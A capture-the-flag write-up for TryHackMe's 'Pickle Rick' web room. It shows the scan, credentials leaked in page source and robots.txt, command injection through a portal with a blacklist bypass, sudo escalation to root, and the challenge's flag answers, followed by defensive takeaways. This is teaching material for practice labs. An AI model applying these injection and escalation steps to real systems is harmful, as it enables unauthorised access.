CTF Writeup

Pickle Rick

TryHackMe · Web Exploitation · Easy · by 0xb0rn3

Platform TryHackMe Category Web Exploitation / Command Injection Difficulty Easy Target 10.49.178.139 Stack Apache 2.4.41 / Ubuntu 20.04 / PHP Flags 3 ingredients found
0
Context

Overview

Rick has turned himself into a pickle and needs three secret ingredients scattered across the filesystem to brew his reverse-potion. The attack surface is a web server with credentials leaked in HTML comments and robots.txt, leading to a command execution panel with a blacklisted cat that's trivially bypassed. The web user has unrestricted passwordless sudo — full root from the first shell.

ATTACK CHAIN 
nmap scan
  └─► Port 80 open (Apache)
        └─► HTML source comment → Username: R1ckRul3s
        └─► /robots.txt         → Password: Wubbalubbadubdub
              └─► /login.php     → portal.php (RCE panel)
                    └─► ls /var/www/html     → Ingredient 1
                    └─► ls /home/rick        → Ingredient 2
                    └─► sudo -l (NOPASSWD: ALL)
                          └─► sudo ls /root  → Ingredient 3
1
Reconnaissance

Port Scan

BASH 
$ nmap -sV -sC -p- --min-rate 5000 10.49.178.139
PortServiceVersion
22/tcpSSHOpenSSH 8.2p1 Ubuntu
80/tcpHTTPApache httpd 2.4.41

Minimal attack surface — just SSH and a web server. All the action is on port 80.

2
Enumeration

Credential Harvesting

The main page source contains a developer note left in an HTML comment — the kind of mistake that happens more often in production than anyone wants to admit:

HTML 
<!--
    Note to self, remember username!
    Username: R1ckRul3s
-->

And robots.txt — instead of disallowing paths, it contains a single string that turns out to be the password:

BASH 
$ curl http://10.49.178.139/robots.txt
Wubbalubbadubdub

Credentials obtained: R1ckRul3s / Wubbalubbadubdub. Login at /login.php redirects to /portal.php — a command execution panel.

3
Exploitation

Command Injection — RCE Confirmed

The portal accepts and executes OS commands server-side. The cat command is blacklisted, but less, head, tail, and strings all work — a classic incomplete filter bypass.

RCE 
Command: whoami
www-data

Command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
4
Flag Hunt

Ingredient 1 — Web Root

RCE 
Command: ls /var/www/html
Sup3rS3cretPickl3Ingred.txt
assets  clue.txt  denied.php  index.html  login.php  portal.php

Command: less Sup3rS3cretPickl3Ingred.txt
mr. meeseek hair
 Ingredient 1
mr. meeseek hair

clue.txt hints to look around the filesystem for the remaining ingredients.

5
Flag Hunt

Ingredient 2 — Rick's Home Directory

RCE 
Command: ls /home/rick
second ingredients

Command: less "/home/rick/second ingredients"
1 jerry tear
 Ingredient 2
1 jerry tear
6
Privilege Escalation

Sudo NOPASSWD → Ingredient 3

Checking sudo privileges reveals the worst possible configuration — www-data can run anything as root without a password:

RCE 
Command: sudo -l
User www-data may run the following commands:
    (ALL) NOPASSWD: ALL

Command: sudo ls /root
3rd.txt  snap

Command: sudo less /root/3rd.txt
fleeb juice
 Ingredient 3
fleeb juice
Visualization

Attack Chain

1
HTML Source — Username Leak
Developer comment in page source: R1ckRul3s
2
robots.txt — Password Leak
Password stored in plaintext: Wubbalubbadubdub
3
Portal Login → Command Injection
Authenticated RCE via /portal.php command panel — cat blocked, less works
4
Filesystem Enumeration
Ingredient 1 in web root, Ingredient 2 in /home/rick
sudo NOPASSWD: ALL → Root
sudo less /root/3rd.txtIngredient 3: fleeb juice
Assessment

Vulnerabilities

FindingLocationSeverityImpact
OS command injection /portal.php Critical Arbitrary command execution as www-data
NOPASSWD sudo ALL sudoers config Critical Instant root from any www-data shell
Credentials in HTML comment index.html High Username disclosure to any visitor
Password in robots.txt /robots.txt High Credential exposure — indexed by search engines
Incomplete command filter /portal.php Medium cat blocked, but less/head/tail bypass trivially
Defense

Takeaways

No Credentials in Source
HTML comments and robots.txt are publicly accessible. Never store credentials in client-facing files.
Never Expose OS Command Execution
Web panels that execute shell commands are critical vulnerabilities. Blacklisting specific commands is always bypassable.
Principle of Least Privilege
www-data with NOPASSWD: ALL means any web vulnerability is instantly root. Web users should have minimal system access.
Automation

Full-Chain Exploit Script

The entire exploitation chain is automated in pickle_rick_pwn.sh — from credential harvesting through authentication to RCE and all three ingredient extractions.

BASH 
$ chmod +x pickle_rick_pwn.sh
$ ./pickle_rick_pwn.sh 10.49.178.139

[+] Username found in HTML source: R1ckRul3s
[+] Password found in robots.txt:  Wubbalubbadubdub
[+] Login successful — Command Panel accessible
[FLAG] Ingredient 1 → mr. meeseek hair
[FLAG] Ingredient 2 → 1 jerry tear
[FLAG] Ingredient 3 → fleeb juice
[+] Rick's potion is complete. He's human again. *burp*

View source on GitHub

Arsenal

Tools Used

ToolPurpose
nmapPort scanning and service enumeration
curlHTTP requests, credential harvesting, login, RCE
lessFile reading (bypass for blacklisted cat)
pickle_rick_pwn.shFull-chain automated exploit (Bash)